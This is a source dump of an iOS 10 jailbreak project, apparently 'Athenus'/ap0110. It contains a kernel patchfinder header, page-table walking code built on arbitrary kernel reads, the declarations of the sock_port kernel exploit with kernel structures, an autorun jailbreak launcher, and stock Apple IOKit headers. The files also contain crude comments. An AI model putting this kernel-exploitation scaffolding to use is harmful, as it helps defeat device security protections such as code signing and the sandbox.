79 | uint64_t find_fs_lookup_snapshot_metadata_by_name(void);
80 | uint64_t find_mount_common(void);
81 | uint64_t find_fs_snapshot(void);
82 | uint64_t find_vnode_get_snapshot(void);
83 | uint64_t find_pmap_load_trust_cache(void);
84 | uint64_t find_paciza_pointer__l2tp_domain_module_start(void);
85 | uint64_t find_paciza_pointer__l2tp_domain_module_stop(void);
86 | uint64_t find_l2tp_domain_inited(void);
87 | uint64_t find_sysctl__net_ppp_l2tp(void);
88 | uint64_t find_sysctl_unregister_oid(void);
89 | uint64_t find_mov_x0_x4__br_x5(void);
90 | uint64_t find_mov_x9_x0__br_x1(void);
91 | uint64_t find_mov_x10_x3__br_x6(void);
92 | uint64_t find_kernel_forge_pacia_gadget(void);
93 | uint64_t find_kernel_forge_pacda_gadget(void);
94 | uint64_t find_IOUserClient__vtable(void);
95 | uint64_t find_IORegistryEntry__getRegistryEntryID(void);
96 | uint64_t find_cs_blob_generation_count(void);
97 | uint64_t find_cs_find_md(void);
98 | uint64_t find_cs_validate_csblob(void);
99 | uint64_t find_kalloc_canblock(void);
100 | uint64_t find_ubc_cs_blob_allocate_site(void);
101 | uint64_t find_kfree(void);
102 | uint64_t find_hook_cred_label_update_execve(void);
103 | uint64_t find_flow_divert_connect_out(void);
104 | uint64_t find_pmap_loaded_trust_caches(void);
105 | uint64_t find_unix_syscall(void);
106 | uint64_t find_pthread_kext_register(void);
107 | uint64_t find_pthread_callbacks(void);
108 | uint64_t find_unix_syscall_return(void);
109 | uint64_t find_sysent(void);
110 | uint64_t find_syscall(int n);
111 | uint64_t find_proc_find(void);
112 | uint64_t find_proc_rele(void);
113 | // EX: find_mpo(cred_label_update_execve)
114 | #define find_mpo(name) find_mpo_entry(offsetof(struct mac_policy_ops, mpo_ ##name))
115 | uint64_t find_mpo_entry(uint64_t offset);
116 | uint64_t find_hook_policy_syscall(int n);
117 | uint64_t find_hook_mount_check_snapshot_revert(void);
118 | uint64_t find_syscall_set_profile(void);
119 | uint64_t find_syscall_check_sandbox(void);
120 | uint64_t find_sandbox_set_container_copyin(void);
121 | uint64_t find_platform_set_container(void);
122 | uint64_t find_extension_create_file(void);
123 | uint64_t find_extension_add(void);
124 | uint64_t find_extension_release(void);
125 | uint64_t find_sfree(void);
126 | uint64_t find_sb_ustate_create(void);
127 | uint64_t find_sstrdup(void);
128 | uint64_t find_handler_map(void);
129 | uint64_t find_sandbox_handler(const char *name);
130 | uint64_t find_issue_extension_for_mach_service(void);
131 | uint64_t find_issue_extension_for_absolute_path(void);
132 | uint64_t find_copy_path_for_vp(void);
133 | uint64_t find_vn_getpath(void);
134 | uint64_t find_IOMalloc(void);
135 | uint64_t find_IOFree(void);
136 |
137 | uint64_t find_symbol(const char *symbol);
138 |
139 | #endif
140 |
141 | #endif
142 |
--------------------------------------------------------------------------------
/Athenus/pte_stuff_64.h:
--------------------------------------------------------------------------------
1 | #ifndef pte_stuff_64_h
2 | #define pte_stuff_64_h
3 |
4 | #define TTE_INDEX_SHIFT 3
5 | #define TTE_SIZE (1 << TTE_INDEX_SHIFT)
6 | #define TTE_INDEX(vma, level) ((vma.vm_info.level ## _index) << TTE_INDEX_SHIFT)
7 | #define TTE_GET(tte, mask) (tte & mask)
8 | #define TTE_SETB(tte, mask) tte = tte | mask
9 | #define TTE_SET(tte, mask, val) tte = ((tte & (~mask)) | (val & mask))
10 | #define TTE_IS_VALID_MASK 0x1
11 | #define TTE_IS_TABLE_MASK 0x2
12 | #define TTE_BLOCK_ATTR_INDEX_MASK 0x1C
13 | #define TTE_BLOCK_ATTR_NS_MASK 0x20
14 | #define TTE_BLOCK_ATTR_AP_MASK 0xC0
15 | #define TTE_BLOCK_ATTR_AP_RO_MASK 0x80
16 | #define TTE_BLOCK_ATTR_AP_CAN_EL0_ACCESS_MASK 0x40
17 | #define TTE_BLOCK_ATTR_SH_MASK 0x300
18 | #define TTE_BLOCK_ATTR_AF_MASK 0x400
19 | #define TTE_BLOCK_ATTR_NG_MASK 0x800
20 | #define TTE_PHYS_VALUE_MASK 0xFFFFFFFFF000ULL
21 | #define TTE_BLOCK_ATTR_CONTIG_MASK (1ULL << 52)
22 | #define TTE_BLOCK_ATTR_PXN_MASK (1ULL << 53)
23 | #define TTE_BLOCK_ATTR_UXN_MASK (1ULL << 54)
24 | uint64_t gPhysBase,gVirtBase,pmap_store,level1_table,hibit_guess;
25 |
26 | typedef union VMA_4K {
27 | struct {
28 | uint64_t block_off : 12;
29 | uint64_t level3_index : 9;
30 | uint64_t level2_index : 9;
31 | uint64_t level1_index : 9;
32 | uint64_t level0_index : 9;
33 | uint64_t ttbr_selector : 16;
34 | } __attribute__((packed)) vm_info;
35 | uint64_t vmaddr;
36 | } VMA_4K;
37 | typedef union VMA_16K {
38 | struct {
39 | uint64_t block_off : 14;
40 | uint64_t level3_index : 11;
41 | uint64_t level2_index : 11;
42 | uint64_t level1_index : 11;
43 | uint64_t level0_index : 1;
44 | uint64_t ttbr_selector : 16;
45 | } __attribute__((packed)) vm_info;
46 | uint64_t vmaddr;
47 | } VMA_16K;
48 |
49 | VMA_16K vad16;
50 | VMA_4K vad4;
51 | char isvad = 0;
52 |
53 | #define TTELog NSLog
54 | vm_size_t sz = 0;
55 |
56 | void checkvad() {
57 | if (!sz) {
58 | struct utsname u = { 0 };
59 | uname(&u);
60 | host_page_size(mach_host_self(), &sz);
61 | NSLog(@"checkvad: %lx %x", (uintptr_t)sz, getpagesize());
62 | if (strstr(u.machine, "iPad5,") == u.machine) {
63 | sz = 4096; // this is 4k but host_page_size lies to us
64 | }
65 | assert(sz);
66 | if (sz == 4096) {
67 | isvad = 1;
68 | }
69 | }
70 | }
71 | void parse_block_tte(uint64_t tte) {
72 | TTELog(@"TTE physaddr: %016llx", TTE_GET(tte, TTE_PHYS_VALUE_MASK));
73 | TTELog(@"TTE table: %d", !!(TTE_GET(tte, TTE_IS_TABLE_MASK)));
74 | TTELog(@"TTE valid: %d", !!(TTE_GET(tte, TTE_IS_VALID_MASK)));
75 | TTELog(@"TTE userland eXecute Never: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_UXN_MASK)));
76 | TTELog(@"TTE privileged eXecute Never: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_PXN_MASK)));
77 | TTELog(@"TTE contiguous: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_CONTIG_MASK)));
78 | TTELog(@"TTE not global: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_NG_MASK)));
79 | TTELog(@"TTE access flag: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_AF_MASK)));
80 | TTELog(@"TTE shareable: %01llx", (TTE_GET(tte, TTE_BLOCK_ATTR_SH_MASK) >> 8));
81 | TTELog(@"TTE access permissions: %s", (TTE_GET(tte, TTE_BLOCK_ATTR_AP_RO_MASK)) ? "Read only" : "Read/Write");
82 | TTELog(@"TTE access permissions: %s", (TTE_GET(tte, TTE_BLOCK_ATTR_AP_CAN_EL0_ACCESS_MASK)) ? "EL0 (Userland) can access this page" : "EL0 (Userland) cannot access this page");
83 | }
84 |
85 | void pagestuff_64(vm_address_t vmaddr, void (^pagestuff_64_callback)(vm_address_t tte_addr, int addr), vm_address_t table, int level) {
86 |
87 | checkvad();
88 | if (!table) table = level1_table;
89 | if (!level) level = 1;
90 |
91 | vm_address_t tteaddr = 0;
92 |
93 |
94 |
95 | if (sz == 4096) {
96 | VMA_4K target_addr;
97 | target_addr.vmaddr = vmaddr;
98 |
99 | if (level == 1) {
100 | target_addr.vm_info.level1_index -= 0x1c0;
101 | }
102 |
103 | switch (level) {
104 | case 0:
105 | tteaddr = table + TTE_INDEX(target_addr, level0);
106 | break;
107 | case 1:
108 | tteaddr = table + TTE_INDEX(target_addr, level1);
109 | break;
110 |
111 | case 2:
112 | tteaddr = table + TTE_INDEX(target_addr, level2);
113 | break;
114 |
115 | case 3:
116 | tteaddr = table + TTE_INDEX(target_addr, level3);
117 | break;
118 |
119 | default:
120 | break;
121 | }
122 |
123 | } else if (sz == 4096*4) {
124 | VMA_16K target_addr;
125 | target_addr.vmaddr = vmaddr;
126 |
127 | switch (level) {
128 | case 0:
129 | tteaddr = table + TTE_INDEX(target_addr, level0);
130 | break;
131 | case 1:
132 | tteaddr = table + TTE_INDEX(target_addr, level1);
133 | break;
134 |
135 | case 2:
136 | tteaddr = table + TTE_INDEX(target_addr, level2);
137 | break;
138 |
139 | case 3:
140 | tteaddr = table + TTE_INDEX(target_addr, level3);
141 | break;
142 |
143 | default:
144 | break;
145 | }
146 |
147 |
148 | }
149 |
150 | //parse_block_tte(level1_entry);
151 |
152 | pagestuff_64_callback(tteaddr, level);
153 |
154 | uint64_t level1_entry = ReadAnywhere64(tteaddr);
155 |
156 | if (TTE_GET(level1_entry, TTE_IS_TABLE_MASK) && level != 3) {
157 | pagestuff_64(vmaddr, pagestuff_64_callback, (TTE_GET(level1_entry, TTE_PHYS_VALUE_MASK)) - gPhysBase + gVirtBase, level + 1);
158 | }
159 | }
160 |
161 | uint64_t findphys_real(uint64_t virtaddr) {
162 | __block uint64_t physvar = 0;
163 | pagestuff_64(virtaddr, ^(vm_address_t tte_addr, int addr) {
164 | uint64_t tte = ReadAnywhere64(tte_addr);
165 | if (addr == 3) {
166 | physvar = TTE_GET(tte, TTE_PHYS_VALUE_MASK);
167 | }
168 | }, level1_table, isvad ? 1 : 2);
169 |
170 | return physvar;
171 |
172 | }
173 |
174 | #endif
175 |
176 |
--------------------------------------------------------------------------------
/Athenus/sock_port_exploit.h:
--------------------------------------------------------------------------------
1 | //
2 | // exploit.h
3 | // sock_port
4 | //
5 | // Created by Jake James on 7/17/19.
6 | // Copyright © 2019 Jake James. All rights reserved.
7 | //
8 |
9 | #ifndef exploit_h
10 | #define exploit_h
11 |
12 |
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 |
20 | #include "exploit_utilities.h"
21 | #include "kernel_memory.h"
22 |
23 | __BEGIN_DECLS
24 |
25 | #define IPV6_USE_MIN_MTU 42
26 | #define IPV6_PKTINFO 46
27 | #define IPV6_PREFER_TEMPADDR 63
28 |
29 | struct route_in6 {
30 | struct rtentry *ro_rt;
31 | struct llentry *ro_lle;
32 | struct ifaddr *ro_srcia;
33 | uint32_t ro_flags;
34 | struct sockaddr_in6 ro_dst;
35 | };
36 |
37 | struct ip6po_rhinfo {
38 | struct ip6_rthdr *ip6po_rhi_rthdr; /* Routing header */
39 | struct route_in6 ip6po_rhi_route; /* Route to the 1st hop */
40 | };
41 |
42 | struct ip6po_nhinfo {
43 | struct sockaddr *ip6po_nhi_nexthop;
44 | struct route_in6 ip6po_nhi_route; /* Route to the nexthop */
45 | };
46 |
47 | struct ip6_pktopts {
48 | struct mbuf *ip6po_m;
49 | int ip6po_hlim;
50 | struct in6_pktinfo *ip6po_pktinfo;
51 | struct ip6po_nhinfo ip6po_nhinfo;
52 | struct ip6_hbh *ip6po_hbh;
53 | struct ip6_dest *ip6po_dest1;
54 | struct ip6po_rhinfo ip6po_rhinfo;
55 | struct ip6_dest *ip6po_dest2;
56 | int ip6po_tclass;
57 | int ip6po_minmtu;
58 | int ip6po_prefer_tempaddr;
59 | int ip6po_flags;
60 | };
61 |
62 | #define IO_BITS_ACTIVE 0x80000000
63 | #define IOT_PORT 0
64 | #define IKOT_TASK 2
65 | #define IKOT_CLOCK 25
66 | #define IKOT_IOKIT_CONNECT 29
67 |
68 | typedef volatile struct {
69 | uint32_t ip_bits;
70 | uint32_t ip_references;
71 | struct {
72 | uintptr_t data;
73 | uintptr_t type;
74 | } ip_lock; // spinlock
75 | struct {
76 | struct {
77 | struct {
78 | uint32_t flags;
79 | uint32_t waitq_interlock;
80 | uint64_t waitq_set_id;
81 | uint64_t waitq_prepost_id;
82 | struct {
83 | uintptr_t next;
84 | uintptr_t prev;
85 | } waitq_queue;
86 | } waitq;
87 | uintptr_t messages;
88 | uint32_t seqno;
89 | uint32_t receiver_name;
90 | uint16_t msgcount;
91 | uint16_t qlimit;
92 | //uint32_t pad;
93 | } port;
94 | uintptr_t klist;
95 | } ip_messages;
96 | uintptr_t ip_receiver;
97 | uintptr_t ip_kobject;
98 | uintptr_t ip_nsrequest;
99 | uintptr_t ip_pdrequest;
100 | uintptr_t ip_requests;
101 | uintptr_t ip_premsg;
102 | uintptr_t ip_context;
103 | uint32_t ip_flags;
104 | uint32_t ip_mscount;
105 | uint32_t ip_srights;
106 | uint32_t ip_sorights;
107 | } kport_t;
108 |
109 | typedef struct {
110 | struct {
111 | uintptr_t data;
112 | uint32_t reserved : 24,
113 | type : 8;
114 | } lock; // mutex lock
115 | uint32_t ref_count;
116 | uint32_t active;
117 | uint32_t halting;
118 | uintptr_t map;
119 | } ktask_t;
120 |
121 | #define WQT_QUEUE 0x2
122 | #define _EVENT_MASK_BITS ((sizeof(uint32_t) * 8) - 7)
123 |
124 | union waitq_flags {
125 | struct {
126 | uint32_t /* flags */
127 | waitq_type:2, /* only public field */
128 | waitq_fifo:1, /* fifo wakeup policy? */
129 | waitq_prepost:1, /* waitq supports prepost? */
130 | waitq_irq:1, /* waitq requires interrupts disabled */
131 | waitq_isvalid:1, /* waitq structure is valid */
132 | waitq_turnstile_or_port:1, /* waitq is embedded in a turnstile (if irq safe), or port (if not irq safe) */
133 | waitq_eventmask:_EVENT_MASK_BITS;
134 | };
135 | uint32_t flags;
136 | };
137 |
138 |
139 | mach_port_t sock_port_get_tfp0(kptr_t *kbase);
140 | uintptr_t task_self_addr(void);
141 |
142 | __END_DECLS
143 |
144 | #endif /* exploit_h */
145 |
--------------------------------------------------------------------------------
/Athenus/sugondesenuts.h:
--------------------------------------------------------------------------------
1 | /*
2 | * ___ _ _ ___
3 | * __ _ _ __ / _ \/ / |/ _ \
4 | * / _` | '_ \| | | | | | | | |
5 | * | (_| | |_) | |_| | | | |_| |
6 | * \__,_| .__/ \___/|_|_|\___/
7 | * |_|
8 | *
9 | * ap0110 is an autoexecuting jailbreak for iOS 10.x, on 64 and 32 bit.
10 | * Licensed under GPLv2, fuck v3.
11 | * Fuck manticore and iMuseum
12 | *
13 | * - with love from the Athenus Dev Team and w212.
14 | */
15 |
16 | #ifndef sugondesenuts_h
17 | #define sugondesenuts_h
18 |
19 | // happy ld? fuck you sugondesenuts
20 | int viewDidExecute;
21 |
22 | #endif /* sugondesenuts_h */
23 |
--------------------------------------------------------------------------------
/Athenus/untethered.h:
--------------------------------------------------------------------------------
1 | /*
2 | * ___ _ _ ___
3 | * __ _ _ __ / _ \/ / |/ _ \
4 | * / _` | '_ \| | | | | | | | |
5 | * | (_| | |_) | |_| | | | |_| |
6 | * \__,_| .__/ \___/|_|_|\___/
7 | * |_|
8 | *
9 | * ap0110 is an autoexecuting jailbreak for iOS 10.x, on 64 and 32 bit.
10 | * Licensed under GPLv2, fuck v3.
11 | * Fuck manticore and iMuseum
12 | *
13 | * - with love from the Athenus Dev Team and w212.
14 | */
15 |
16 | #ifndef untethered_h
17 | #define untethered_h
18 |
19 | int fun(int argc, char* argv[]);
20 |
21 | #endif /* untethered_h */
22 |
--------------------------------------------------------------------------------
/Athenus/untethered.m:
--------------------------------------------------------------------------------
1 | /*
2 | * ___ _ _ ___
3 | * __ _ _ __ / _ \/ / |/ _ \
4 | * / _` | '_ \| | | | | | | | |
5 | * | (_| | |_) | |_| | | | |_| |
6 | * \__,_| .__/ \___/|_|_|\___/
7 | * |_|
8 | *
9 | * ap0110 is an autoexecuting jailbreak for iOS 10.x, on 64 and 32 bit.
10 | * Licensed under GPLv2, fuck v3.
11 | * Fuck manticore and iMuseum
12 | *
13 | * - with love from the Athenus Dev Team and w212.
14 | */
15 |
16 | #import
17 | #import
18 | #include "config.h"
19 | #include "jailbreak.h"
20 | #include
21 | #include
22 | #include
23 | #include
24 | #include
25 | #import "sugondesenuts.h"
26 |
27 | int (*dsystem)(const char *) = 0;
28 |
29 | void jelbrekme() {
30 | dispatch_async(jailbreak_queue , ^{
31 | //sleep(2);
32 | if (viewDidExecute)
33 | return;
34 | struct utsname name;
35 | uname(&name);
36 | if (!strstr(name.version, "MarijuanARM")){
37 | usleep(USEC_PER_SEC/100);
38 | jailbreak();
39 | }
40 | });
41 | }
42 |
43 | int fun(int argc, char* argv[]) {
44 | dsystem = dlsym(RTLD_DEFAULT,"system");
45 |
46 | /* enable logging */
47 | NSArray *paths = NSSearchPathForDirectoriesInDomains(NSDocumentDirectory,NSUserDomainMask, YES);
48 | NSString *documentsDirectory = [paths objectAtIndex:0];
49 | NSString *fileName =[NSString stringWithFormat:@"%@.txt",[NSDate date]];
50 | NSString *logFilePath = [documentsDirectory stringByAppendingPathComponent:fileName];
51 | freopen([logFilePath cStringUsingEncoding:NSASCIIStringEncoding],"a+",stdout);
52 | freopen([logFilePath cStringUsingEncoding:NSASCIIStringEncoding],"a+",stderr);
53 | NSLog(@"loaded");
54 |
55 | /* do teh jelbrekz */
56 | dispatch_async(dispatch_get_global_queue( DISPATCH_QUEUE_PRIORITY_DEFAULT, 0), ^(void){
57 | __block UIBackgroundTaskIdentifier backgroundTaskIdentifier = [[UIApplication sharedApplication] beginBackgroundTaskWithExpirationHandler:^{
58 |
59 | [[UIApplication sharedApplication] endBackgroundTask:backgroundTaskIdentifier];
60 |
61 | backgroundTaskIdentifier = UIBackgroundTaskInvalid;
62 | }];
63 | if ([[NSFileManager defaultManager]fileExistsAtPath:@"/Applications/Cydia.app/"] /*&& [[NSUserDefaults standardUserDefaults] boolForKey:@"jailbreakEnabled"]*/) {
64 | printf("[*] jailbreaking...\n");
65 | jelbrekme();
66 | }
67 | else {
68 | printf("[*] not jailbreaking...");
69 | }
70 | });
71 | return 0;
72 | }
73 |
--------------------------------------------------------------------------------
/IOKit.framework/Headers/IOKitKeys.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright (c) 1998-2000 Apple Computer, Inc. All rights reserved.
3 | *
4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
5 | *
6 | * This file contains Original Code and/or Modifications of Original Code
7 | * as defined in and that are subject to the Apple Public Source License
8 | * Version 2.0 (the 'License'). You may not use this file except in
9 | * compliance with the License. The rights granted to you under the License
10 | * may not be used to create, or enable the creation or redistribution of,
11 | * unlawful or unlicensed copies of an Apple operating system, or to
12 | * circumvent, violate, or enable the circumvention or violation of, any
13 | * terms of an Apple operating system software license agreement.
14 | *
15 | * Please obtain a copy of the License at
16 | * http://www.opensource.apple.com/apsl/ and read it before using this file.
17 | *
18 | * The Original Code and all software distributed under the License are
19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
23 | * Please see the License for the specific language governing rights and
24 | * limitations under the License.
25 | *
26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
27 | */
28 | /*
29 | * Copyright (c) 1999 Apple Computer, Inc. All rights reserved.
30 | *
31 | * Common symbol definitions for IOKit.
32 | *
33 | * HISTORY
34 | *
35 | */
36 |
37 |
38 | #ifndef _IOKIT_IOKITKEYS_H
39 | #define _IOKIT_IOKITKEYS_H
40 |
41 | // properties found in the registry root
42 | #define kIOKitBuildVersionKey "IOKitBuildVersion"
43 | #define kIOKitDiagnosticsKey "IOKitDiagnostics"
44 | // a dictionary keyed by plane name
45 | #define kIORegistryPlanesKey "IORegistryPlanes"
46 | #define kIOCatalogueKey "IOCatalogue"
47 |
48 | // registry plane names
49 | #define kIOServicePlane "IOService"
50 | #define kIOPowerPlane "IOPower"
51 | #define kIODeviceTreePlane "IODeviceTree"
52 | #define kIOAudioPlane "IOAudio"
53 | #define kIOFireWirePlane "IOFireWire"
54 | #define kIOUSBPlane "IOUSB"
55 |
56 | // registry ID number
57 | #define kIORegistryEntryIDKey "IORegistryEntryID"
58 |
59 | // IOService class name
60 | #define kIOServiceClass "IOService"
61 |
62 | // IOResources class name
63 | #define kIOResourcesClass "IOResources"
64 |
65 | // IOService driver probing property names
66 | #define kIOClassKey "IOClass"
67 | #define kIOProbeScoreKey "IOProbeScore"
68 | #define kIOKitDebugKey "IOKitDebug"
69 |
70 | // IOService matching property names
71 | #define kIOProviderClassKey "IOProviderClass"
72 | #define kIONameMatchKey "IONameMatch"
73 | #define kIOPropertyMatchKey "IOPropertyMatch"
74 | #define kIOPathMatchKey "IOPathMatch"
75 | #define kIOLocationMatchKey "IOLocationMatch"
76 | #define kIOParentMatchKey "IOParentMatch"
77 | #define kIOResourceMatchKey "IOResourceMatch"
78 | #define kIOMatchedServiceCountKey "IOMatchedServiceCountMatch"
79 |
80 | #define kIONameMatchedKey "IONameMatched"
81 |
82 | #define kIOMatchCategoryKey "IOMatchCategory"
83 | #define kIODefaultMatchCategoryKey "IODefaultMatchCategory"
84 |
85 | // IOService default user client class, for loadable user clients
86 | #define kIOUserClientClassKey "IOUserClientClass"
87 |
88 | // key to find IOMappers
89 | #define kIOMapperIDKey "IOMapperID"
90 |
91 | #define kIOUserClientCrossEndianKey "IOUserClientCrossEndian"
92 | #define kIOUserClientCrossEndianCompatibleKey "IOUserClientCrossEndianCompatible"
93 | #define kIOUserClientSharedInstanceKey "IOUserClientSharedInstance"
94 | // diagnostic string describing the creating task
95 | #define kIOUserClientCreatorKey "IOUserClientCreator"
96 |
97 | // IOService notification types
98 | #define kIOPublishNotification "IOServicePublish"
99 | #define kIOFirstPublishNotification "IOServiceFirstPublish"
100 | #define kIOMatchedNotification "IOServiceMatched"
101 | #define kIOFirstMatchNotification "IOServiceFirstMatch"
102 | #define kIOTerminatedNotification "IOServiceTerminate"
103 |
104 | // IOService interest notification types
105 | #define kIOGeneralInterest "IOGeneralInterest"
106 | #define kIOBusyInterest "IOBusyInterest"
107 | #define kIOAppPowerStateInterest "IOAppPowerStateInterest"
108 | #define kIOPriorityPowerStateInterest "IOPriorityPowerStateInterest"
109 |
110 | #define kIOPlatformDeviceMessageKey "IOPlatformDeviceMessage"
111 |
112 | // IOService interest notification types
113 | #define kIOCFPlugInTypesKey "IOCFPlugInTypes"
114 |
115 | // properties found in services that implement command pooling
116 | #define kIOCommandPoolSizeKey "IOCommandPoolSize" // (OSNumber)
117 |
118 | // properties found in services that have transfer constraints
119 | #define kIOMaximumBlockCountReadKey "IOMaximumBlockCountRead" // (OSNumber)
120 | #define kIOMaximumBlockCountWriteKey "IOMaximumBlockCountWrite" // (OSNumber)
121 | #define kIOMaximumByteCountReadKey "IOMaximumByteCountRead" // (OSNumber)
122 | #define kIOMaximumByteCountWriteKey "IOMaximumByteCountWrite" // (OSNumber)
123 | #define kIOMaximumSegmentCountReadKey "IOMaximumSegmentCountRead" // (OSNumber)
124 | #define kIOMaximumSegmentCountWriteKey "IOMaximumSegmentCountWrite" // (OSNumber)
125 | #define kIOMaximumSegmentByteCountReadKey "IOMaximumSegmentByteCountRead" // (OSNumber)
126 | #define kIOMaximumSegmentByteCountWriteKey "IOMaximumSegmentByteCountWrite" // (OSNumber)
127 | #define kIOMinimumSegmentAlignmentByteCountKey "IOMinimumSegmentAlignmentByteCount" // (OSNumber)
128 | #define kIOMaximumSegmentAddressableBitCountKey "IOMaximumSegmentAddressableBitCount" // (OSNumber)
129 |
130 | // properties found in services that wish to describe an icon
131 | //
132 | // IOIcon =
133 | // {
134 | // CFBundleIdentifier = "com.example.driver.example";
135 | // IOBundleResourceFile = "example.icns";
136 | // };
137 | //
138 | // where IOBundleResourceFile is the filename of the resource
139 |
140 | #define kIOIconKey "IOIcon" // (OSDictionary)
141 | #define kIOBundleResourceFileKey "IOBundleResourceFile" // (OSString)
142 |
143 | #define kIOBusBadgeKey "IOBusBadge" // (OSDictionary)
144 | #define kIODeviceIconKey "IODeviceIcon" // (OSDictionary)
145 |
146 | // property of root that describes the machine's serial number as a string
147 | #define kIOPlatformSerialNumberKey "IOPlatformSerialNumber" // (OSString)
148 |
149 | // property of root that describes the machine's UUID as a string
150 | #define kIOPlatformUUIDKey "IOPlatformUUID" // (OSString)
151 |
152 | // IODTNVRAM property keys
153 | #define kIONVRAMDeletePropertyKey "IONVRAM-DELETE-PROPERTY"
154 | #define kIODTNVRAMPanicInfoKey "aapl,panic-info"
155 |
156 | // keys for complex boot information
157 | #define kIOBootDeviceKey "IOBootDevice" // dict | array of dicts
158 | #define kIOBootDevicePathKey "IOBootDevicePath" // arch-neutral OSString
159 | #define kIOBootDeviceSizeKey "IOBootDeviceSize" // OSNumber of bytes
160 |
161 | // keys for OS Version information
162 | #define kOSBuildVersionKey "OS Build Version"
163 |
164 | #endif /* ! _IOKIT_IOKITKEYS_H */
165 |
--------------------------------------------------------------------------------
/IOKit.framework/Headers/IOReturn.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright (c) 1998-2002 Apple Computer, Inc. All rights reserved.
3 | *
4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
5 | *
6 | * This file contains Original Code and/or Modifications of Original Code
7 | * as defined in and that are subject to the Apple Public Source License
8 | * Version 2.0 (the 'License'). You may not use this file except in
9 | * compliance with the License. The rights granted to you under the License
10 | * may not be used to create, or enable the creation or redistribution of,
11 | * unlawful or unlicensed copies of an Apple operating system, or to
12 | * circumvent, violate, or enable the circumvention or violation of, any
13 | * terms of an Apple operating system software license agreement.
14 | *
15 | * Please obtain a copy of the License at
16 | * http://www.opensource.apple.com/apsl/ and read it before using this file.
17 | *
18 | * The Original Code and all software distributed under the License are
19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
23 | * Please see the License for the specific language governing rights and
24 | * limitations under the License.
25 | *
26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
27 | */
28 | /*
29 | * HISTORY
30 | */
31 |
32 | /*
33 | * Core IOReturn values. Others may be family defined.
34 | */
35 |
36 | #ifndef __IOKIT_IORETURN_H
37 | #define __IOKIT_IORETURN_H
38 |
39 | #ifdef __cplusplus
40 | extern "C" {
41 | #endif
42 |
43 | #include
44 |
45 | typedef kern_return_t IOReturn;
46 |
47 | #ifndef sys_iokit
48 | #define sys_iokit err_system(0x38)
49 | #endif /* sys_iokit */
50 | #define sub_iokit_common err_sub(0)
51 | #define sub_iokit_usb err_sub(1)
52 | #define sub_iokit_firewire err_sub(2)
53 | #define sub_iokit_block_storage err_sub(4)
54 | #define sub_iokit_graphics err_sub(5)
55 | #define sub_iokit_networking err_sub(6)
56 | #define sub_iokit_bluetooth err_sub(8)
57 | #define sub_iokit_pmu err_sub(9)
58 | #define sub_iokit_acpi err_sub(10)
59 | #define sub_iokit_smbus err_sub(11)
60 | #define sub_iokit_ahci err_sub(12)
61 | #define sub_iokit_powermanagement err_sub(13)
62 | //#define sub_iokit_hidsystem err_sub(14)
63 | #define sub_iokit_scsi err_sub(16)
64 | //#define sub_iokit_pccard err_sub(21)
65 |
66 | #define sub_iokit_vendor_specific err_sub(-2)
67 | #define sub_iokit_reserved err_sub(-1)
68 |
69 | #define iokit_common_err(return) (sys_iokit|sub_iokit_common|return)
70 | #define iokit_family_err(sub,return) (sys_iokit|sub|return)
71 | #define iokit_vendor_specific_err(return) (sys_iokit|sub_iokit_vendor_specific|return)
72 |
73 | #define kIOReturnSuccess KERN_SUCCESS // OK
74 | #define kIOReturnError iokit_common_err(0x2bc) // general error
75 | #define kIOReturnNoMemory iokit_common_err(0x2bd) // can't allocate memory
76 | #define kIOReturnNoResources iokit_common_err(0x2be) // resource shortage
77 | #define kIOReturnIPCError iokit_common_err(0x2bf) // error during IPC
78 | #define kIOReturnNoDevice iokit_common_err(0x2c0) // no such device
79 | #define kIOReturnNotPrivileged iokit_common_err(0x2c1) // privilege violation
80 | #define kIOReturnBadArgument iokit_common_err(0x2c2) // invalid argument
81 | #define kIOReturnLockedRead iokit_common_err(0x2c3) // device read locked
82 | #define kIOReturnLockedWrite iokit_common_err(0x2c4) // device write locked
83 | #define kIOReturnExclusiveAccess iokit_common_err(0x2c5) // exclusive access and
84 | // device already open
85 | #define kIOReturnBadMessageID iokit_common_err(0x2c6) // sent/received messages
86 | // had different msg_id
87 | #define kIOReturnUnsupported iokit_common_err(0x2c7) // unsupported function
88 | #define kIOReturnVMError iokit_common_err(0x2c8) // misc. VM failure
89 | #define kIOReturnInternalError iokit_common_err(0x2c9) // internal error
90 | #define kIOReturnIOError iokit_common_err(0x2ca) // General I/O error
91 | //#define kIOReturn???Error iokit_common_err(0x2cb) // ???
92 | #define kIOReturnCannotLock iokit_common_err(0x2cc) // can't acquire lock
93 | #define kIOReturnNotOpen iokit_common_err(0x2cd) // device not open
94 | #define kIOReturnNotReadable iokit_common_err(0x2ce) // read not supported
95 | #define kIOReturnNotWritable iokit_common_err(0x2cf) // write not supported
96 | #define kIOReturnNotAligned iokit_common_err(0x2d0) // alignment error
97 | #define kIOReturnBadMedia iokit_common_err(0x2d1) // Media Error
98 | #define kIOReturnStillOpen iokit_common_err(0x2d2) // device(s) still open
99 | #define kIOReturnRLDError iokit_common_err(0x2d3) // rld failure
100 | #define kIOReturnDMAError iokit_common_err(0x2d4) // DMA failure
101 | #define kIOReturnBusy iokit_common_err(0x2d5) // Device Busy
